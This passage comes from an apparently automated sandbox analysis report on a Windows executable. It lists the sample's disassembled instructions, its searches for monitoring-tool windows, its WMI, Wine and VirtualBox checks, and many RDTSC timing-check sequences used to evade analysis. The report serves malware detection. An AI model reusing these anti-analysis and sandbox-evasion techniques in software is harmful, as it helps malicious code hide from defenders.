    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D80756 push FFFFFFDDh; ret 0_3_00D8075D
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D80756 push FFFFFFDDh; ret 0_3_00D8075D
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D79986 push ecx; retf 0_3_00D799B9
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D79986 push ecx; retf 0_3_00D799B9
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCDF2 push edi; ret 0_3_00DFCDF3
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00DFCD22 push edi; ret 0_3_00DFCD23
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D80756 push FFFFFFDDh; ret 0_3_00D8075D
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D80756 push FFFFFFDDh; ret 0_3_00D8075D
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeCode function: 0_3_00D79986 push ecx; retf 0_3_00D799B9
    Source: ASIr1Bo2x9.exeStatic PE information: section name: entropy: 7.9841832142391

    Boot Survival

    barindex
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: RegmonClassJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: FilemonClassJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: FilemonclassJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWindow searched: window name: RegmonclassJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

    Malware Analysis System Evasion

    barindex
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeSystem information queried: FirmwareTableInformationJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: HKEY_CURRENT_USER\Software\WineJump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeFile opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__Jump to behavior
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: F15D12 second address: F15D1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jl 00007F30F50FDE2Ch 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: F15D1F second address: F15D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007F30F4CF3436h 0x00000010 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: F15D2F second address: F15D35 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: F15D35 second address: F15D4F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F4CF3446h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 108AA9C second address: 108AAB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 108AAB6 second address: 108AABC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 108AABC second address: 108AAC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 108AAC0 second address: 108AACC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 108AACC second address: 108AAD0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1093764 second address: 109376A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 109376A second address: 1093774 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F30F50FDE26h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1093774 second address: 109378B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F30F4CF3441h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 109378B second address: 10937A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F30F50FDE33h 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10938FD second address: 1093901 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1093901 second address: 1093905 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1093905 second address: 109390B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 109390B second address: 1093915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1093915 second address: 1093929 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F30F4CF3436h 0x00000008 jnc 00007F30F4CF3436h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1093929 second address: 109392F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 109392F second address: 1093933 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1093AB8 second address: 1093AC1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1093AC1 second address: 1093AC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1093BEA second address: 1093BEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1095DE6 second address: 1095DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1095DEC second address: 1095DF0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1095DF0 second address: 1095E70 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF343Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push eax 0x00000011 call 00007F30F4CF3438h 0x00000016 pop eax 0x00000017 mov dword ptr [esp+04h], eax 0x0000001b add dword ptr [esp+04h], 0000001Ch 0x00000023 inc eax 0x00000024 push eax 0x00000025 ret 0x00000026 pop eax 0x00000027 ret 0x00000028 xor dx, EC8Ah 0x0000002d movzx edi, dx 0x00000030 push 00000000h 0x00000032 jno 00007F30F4CF343Eh 0x00000038 adc cx, 9F5Ah 0x0000003d call 00007F30F4CF3439h 0x00000042 jnl 00007F30F4CF344Bh 0x00000048 push esi 0x00000049 jmp 00007F30F4CF3443h 0x0000004e pop esi 0x0000004f push eax 0x00000050 push ecx 0x00000051 push eax 0x00000052 push edx 0x00000053 push eax 0x00000054 push edx 0x00000055 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1095E70 second address: 1095E74 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1095E74 second address: 1095EAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF343Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e pushad 0x0000000f jmp 00007F30F4CF343Ah 0x00000014 pushad 0x00000015 ja 00007F30F4CF3436h 0x0000001b jp 00007F30F4CF3436h 0x00000021 popad 0x00000022 popad 0x00000023 mov eax, dword ptr [eax] 0x00000025 pushad 0x00000026 pushad 0x00000027 push eax 0x00000028 push edx 0x00000029 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1095EAC second address: 1095ECC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F30F50FDE37h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1095ECC second address: 1095F5E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b je 00007F30F4CF3442h 0x00000011 je 00007F30F4CF343Ch 0x00000017 jns 00007F30F4CF3436h 0x0000001d pop eax 0x0000001e and ecx, dword ptr [ebp+122D3C3Ch] 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 jne 00007F30F4CF343Ch 0x0000002e push 00000003h 0x00000030 push 00000000h 0x00000032 push ecx 0x00000033 call 00007F30F4CF3438h 0x00000038 pop ecx 0x00000039 mov dword ptr [esp+04h], ecx 0x0000003d add dword ptr [esp+04h], 0000001Bh 0x00000045 inc ecx 0x00000046 push ecx 0x00000047 ret 0x00000048 pop ecx 0x00000049 ret 0x0000004a call 00007F30F4CF3439h 0x0000004f jmp 00007F30F4CF343Dh 0x00000054 push eax 0x00000055 jmp 00007F30F4CF343Ch 0x0000005a mov eax, dword ptr [esp+04h] 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F30F4CF3440h 0x00000065 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1095F5E second address: 1095FA6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE35h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jg 00007F30F50FDE28h 0x00000018 popad 0x00000019 mov dword ptr [esp+04h], eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edi 0x00000020 jmp 00007F30F50FDE35h 0x00000025 pop edi 0x00000026 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1095FA6 second address: 1095FAC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1096087 second address: 1096091 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1096091 second address: 109611D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3444h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xor dword ptr [esp], 697F5691h 0x00000011 jnc 00007F30F4CF3448h 0x00000017 push 00000003h 0x00000019 mov dx, di 0x0000001c push 00000000h 0x0000001e movsx ecx, si 0x00000021 push 00000003h 0x00000023 jg 00007F30F4CF343Ch 0x00000029 push DB62EAD5h 0x0000002e jmp 00007F30F4CF343Ch 0x00000033 xor dword ptr [esp], 1B62EAD5h 0x0000003a jnp 00007F30F4CF3442h 0x00000040 jg 00007F30F4CF343Ch 0x00000046 mov dword ptr [ebp+122D1E37h], ecx 0x0000004c lea ebx, dword ptr [ebp+12453BAEh] 0x00000052 xor dword ptr [ebp+122D37B0h], ebx 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c push eax 0x0000005d push edx 0x0000005e rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 109611D second address: 1096121 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B628A second address: 10B628E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B628E second address: 10B6294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B6294 second address: 10B62AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 ja 00007F30F4CF343Eh 0x0000000c jns 00007F30F4CF3436h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B62AE second address: 10B62B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B62B2 second address: 10B62E0 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F30F4CF3447h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F30F4CF343Dh 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B62E0 second address: 10B62E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 107D399 second address: 107D39D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 107D39D second address: 107D3A6 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B420A second address: 10B421C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007F30F4CF343Bh 0x00000008 pop ecx 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B4622 second address: 10B4626 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B47C9 second address: 10B47CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B47CD second address: 10B47E0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F30F50FDE26h 0x00000008 jl 00007F30F50FDE26h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B47E0 second address: 10B47E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B47E5 second address: 10B47EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B4AD7 second address: 10B4ADC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B4ADC second address: 10B4B08 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F30F50FDE2Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F30F50FDE34h 0x00000011 push edi 0x00000012 push esi 0x00000013 pop esi 0x00000014 pop edi 0x00000015 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B4B08 second address: 10B4B0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B4B0E second address: 10B4B18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F30F50FDE26h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B4C66 second address: 10B4C6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B4C6C second address: 10B4C8A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE32h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B4C8A second address: 10B4C8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B4C8E second address: 10B4CC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F50FDE37h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a jmp 00007F30F50FDE39h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pop edi 0x00000012 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B50BE second address: 10B50C8 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F30F4CF3436h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B50C8 second address: 10B50DF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F30F50FDE2Fh 0x0000000d rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B50DF second address: 10B50FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007F30F4CF3446h 0x0000000b rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B5252 second address: 10B5258 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B5258 second address: 10B526B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnp 00007F30F4CF3436h 0x0000000d js 00007F30F4CF3436h 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 1087582 second address: 108758C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F30F50FDE26h 0x0000000a rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 108758C second address: 10875B1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F30F4CF3446h 0x00000007 jbe 00007F30F4CF3436h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10875B1 second address: 10875D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jo 00007F30F50FDE26h 0x0000000f jmp 00007F30F50FDE35h 0x00000014 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10875D5 second address: 10875D9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B53AF second address: 10B53BB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F30F50FDE26h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B53BB second address: 10B53BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B53BF second address: 10B53D2 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F30F50FDE26h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B53D2 second address: 10B53D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B53D6 second address: 10B53DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
    Source: C:\Users\user\Desktop\ASIr1Bo2x9.exeRDTSC instruction interceptor: First address: 10B5B76 second address: 10B5B7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
